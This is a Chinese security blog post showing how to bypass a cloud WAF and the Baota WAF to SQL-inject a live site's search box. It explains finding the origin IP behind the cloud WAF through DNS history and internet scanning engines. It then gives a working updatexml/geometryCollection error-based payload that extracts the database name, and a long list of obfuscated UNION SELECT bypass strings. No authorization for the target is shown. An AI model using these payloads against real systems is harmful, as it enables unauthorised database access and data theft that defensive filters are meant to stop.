SQL注入绕过宝塔+云waf

admin

103422
文章

87
评论

2023年7月30日22:01:34评论180 views字数 2966阅读9分53秒阅读模式

现在只对常读和星标的公众号才展示大图推送，建议大家能把威零安全实验室“设为星标”，否则可能就看不到了啦！

SQL注入绕过宝塔+云waf

免责声明

本文章仅用于信息安全防御技术分享，因用于其他用途而产生不良后果,作者不承担任何法律责任，请严格遵循中华人民共和国相关法律法规，禁止做一切违法犯罪行为。

由于传播、利用本公众号所发布的而造成的任何直接或者间接的后果及损失，均由使用者本人承担。威零安全实验室公众号及原文章作者不为此承担任何责任，一旦造成后果请自行承担！如有侵权烦请告知，我们会立即删除并致歉。谢谢！

0x01 多重waf绕过

注入点搜索框

SQL注入绕过宝塔+云waf

单双引号进行测试
看看是字符型的还是数字型的，发现是字符型 SQL注入绕过宝塔+云waf

准备上语句发现有宝塔waf+云waf

0x02 过云waf

首先看看有无cdn节点

全球ping

发现这两个没有回应真实ip，就去看看用fofa或者hunter来在真实ip，hunter上面显示183是云厂商肯定是云waf，不能用这个ip

之后在看fofa上面能不能找到真实ip

发现这个ip跟历史解析记录是同一个c段的

然后用拦截云waf的语句来试试，发现无云waf显示

找云waf的几种方式

1.  通过全球ping2.  找历史解析记录3.  通过fofa或者hunter空间引擎来搜索4.  通过历史解析记录扫c段

0x03 过宝塔waf

1.报错注入

首先判断出字符型的话，就得去测试’||||’ ‘or+or’的语句，但是我发现他这里只要是在两个or之间出现东西，就一定会触发宝塔waf

当时试了很多思路，发现可以’;%00方法，还有可以加--+注释符的，但是尝试之后只有--+可以正常回显

其实这里最初的思路根本不是什么’||||’，这里是按照1’||1=1来测试

然后尝试想把1=1，后面这个1能不能换成报错函数之类的，发现直接被拦

所以我猜测这个是不是有可能把mysql所有的报错函数都给拦了一下，尝试其他的报错函数看看

exp

floor

例如：Polygon，GeometryCollection，MultiPoint，MultiLineString我发现这几个都没有过滤，可能就过滤了平常可见的报错函数

既然这函数可以用，那我们就开始构造语句试试，正常的语句用不了，那我们就玩点不正常的

看看这函数怎么搞的，把里面的语句替换成1，看看哪里出了问题，发包，发现他这个1直接爆出来了

尝试能不能select database()这样，把库名搞出来

发现还是不行
可能是因为database()后面跟着--没有闭合的原因，加个||’来试试能不能闭合

emmm，还是不行
既然select database()不行，那就试试再套一层报错函数，看看能不能行

Pyload：1'||1=geometryCollection(updatexml(1,concat(0x7e,database(),0x7e),1))--+

发包

哟西，果然能行，出库名了，成功绕过waf

2.联合注入

直接'ordre by xx --+

正常判断出库名，17正常 18报错

然后fuzz union select 函数，尝试太多截图就不放了，直接快进到最后一步

/*!%55NiOn*/ /*!%53eLEct*/ %55nion(%53elect 1,2,3)-- - +union+distinct+select+ +union+distinctROW+select+ /**//*!12345UNION SELECT*//**/ /**//*!50000UNION SELECT*//**/ /**/UNION/**//*!50000SELECT*//**/ /*!50000UniON SeLeCt*/ union /*!50000%53elect*/ +#uNiOn+#sEleCt +#1q%0AuNiOn all#qa%0A#%0AsEleCt /*!%55NiOn*/ /*!%53eLEct*/ /*!u%6eion*/ /*!se%6cect*/ +un/**/ion+se/**/lect uni%0bon+se%0blect %2f**%2funion%2f**%2fselect union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A REVERSE(noinu)+REVERSE(tceles) /*--*/union/*--*/select/*--*/ union (/*!/**/ SeleCT */ 1,2,3) /*!union*/+/*!select*/ union+/*!select*/ /**/union/**/select/**/ /**/uNIon/**/sEleCt/**/ /**//*!union*//**//*!select*//**/ /*!uNIOn*/ /*!SelECt*/ +union+distinct+select+ +union+distinctROW+select+ +UnIOn%0d%0aSeleCt%0d%0a UNION/*&test=1*/SELECT/*&pwn=2*/ un?+un/**/ion+se/**/lect+ +UNunionION+SEselectLECT+ +uni%0bon+se%0blect+ %252f%252a*/union%252f%252a /select%252f%252a*/ /%2A%2A/union/%2A%2A/select/%2A%2A/ %2f**%2funion%2f**%2fselect%2f**%2f union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A /*!UnIoN*/SeLecT+  %55nion(%53elect)   union%20distinct%20select   union%20%64istinctRO%57%20select   union%2053elect   %23?%0auion%20?%23?%0aselect   %23?zen?%0Aunion all%23zen%0A%23Zen%0Aselect   %55nion %53eLEct   u%6eion se%6cect   unio%6e %73elect   unio%6e%20%64istinc%74%20%73elect   uni%6fn distinct%52OW s%65lect

Pyload：

union+distinctROW+select

开始构造，pyload如图，发包

成功绕过

每日祝福

祝师傅们，天天高危、日日0day！！！！！！！！！！！！！！！

广告时刻

欢迎加入星球！

威零安全，星球永久开放，内容包括：实战报告+hvv红蓝资料+代码审计+免杀+渗透学习资源+各种资料文档+直播课短期一年，后续将开发自己的红队工具库供大家使用。有需要的可以添加后台微信联系本人。

SQL注入绕过宝塔+云waf

或者翻到文章末尾添加机器人进群考察。

星球的最近主题和星球内部工具一些展示

SQL注入绕过宝塔+云waf

PY交易

为了方便师傅们交流学习，我特意创建了一个群聊。内部会分享一些脱敏的漏洞报告,渗透测试实战案例，更有若干大牛巨佬分享经验。后续还会提供一些福利包括送书，小礼物等等，欢迎各位师傅进群交流

由于“威零安全交流群”群聊人数已满200人，扫码进不了的师傅可以添加机器人secbot回复“威零科技”即可加入群聊

SQL注入绕过宝塔+云waf

原文始发于微信公众号（威零安全实验室）：SQL注入绕过宝塔+云waf

左青龙
微信扫一扫

右白虎
微信扫一扫

SQL注入绕过宝塔+云waf

现在只对常读和星标的公众号才展示大图推送，建议大家能把威零安全实验室“设为星标”，否则可能就看不到了啦！

0x01 多重waf绕过

0x03 过宝塔waf

1.报错注入

2.联合注入

对C2 Havoc的流量检测分析含检测脚本

记【phpMyAdmin默认安装漏洞】

某积分商城任意金额支付漏洞分析利用及思考

未授权访问合集

安服仔养成篇——基线检查

黑掉Apple 系列 - 从 SQL 注入到远程代码执行

制造业供应链如何实现数字化转型？详解供应链数据平台建设

实战|跨越一年后的再次渗透

原创 Paper | 从 XZ 后门学奇技淫巧

某H5购物商城系统审计(未公开漏洞)

发表评论

在线咨询

微信